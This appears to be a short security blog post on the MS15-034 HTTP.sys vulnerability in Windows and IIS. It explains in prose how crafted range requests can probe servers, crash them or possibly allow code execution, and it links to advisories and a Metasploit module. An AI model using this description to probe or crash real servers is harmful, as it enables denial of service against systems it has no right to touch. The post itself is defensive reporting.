This entry is chiefly intended as a collection of links to further information on MS15-034 which was announced this Tuesday. This vulnerability is found within the Microsoft Windows component that allows various packages to listen to HTTP requests – the obvious one being IIS, although there are many other software packages that use the vulnerable component.
The vulnerability is in relation to a kernel accelerator for web servers, and the vulnerability is in relation to a feature that allows for ranges of an object to be fetched. The exploit for the vulnerability comes in three different guises :-
- An informational probe. If an “attacker” requests a range starting with 0, then the response indicates whether the server is vulnerable or not.
- A denial of service attack. If the attacker requests a range starting with 20 (or higher), then the server is blue-screened (i.e. it crashes).
- A remote code execution attack. If the attacker requests an unknown range than the attacker may in theory be able to execute their own code on the server. Essentially they take over ownership of the server.
In terms of what we have actually seen, attack traffic has been limited to sources that are apparently just scanning for vulnerable systems. But we have seen it.
There are plenty of media reports panicking over it right now, but whilst it is a serious vulnerability, it is not as serious as it first seems. The remote code execution vulnerability is theoretical at the moment and there is a really rather simple work-around for those who cannot patch.
Links :-
- https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+April+2015/19577/
- https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/ (SANS upgrades status to “PATCH NOW”).
- http://blog.didierstevens.com/2015/04/17/ms15-034-detection-some-observations/
- http://www.theregister.co.uk/2015/04/16/http_sys_exploit_wild_ms15_034/
- https://github.com/rapid7/metasploit-framework/pull/5150